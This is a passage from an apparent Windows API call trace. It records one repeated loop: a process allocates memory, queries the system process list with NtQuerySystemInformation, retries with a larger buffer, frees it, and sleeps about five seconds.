ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.055] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.071] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.101] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.119] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.144] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.164] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.180] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.195] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.213] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.258] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.273] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.288] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.304] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.337] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.354] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.367] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.383] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.399] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 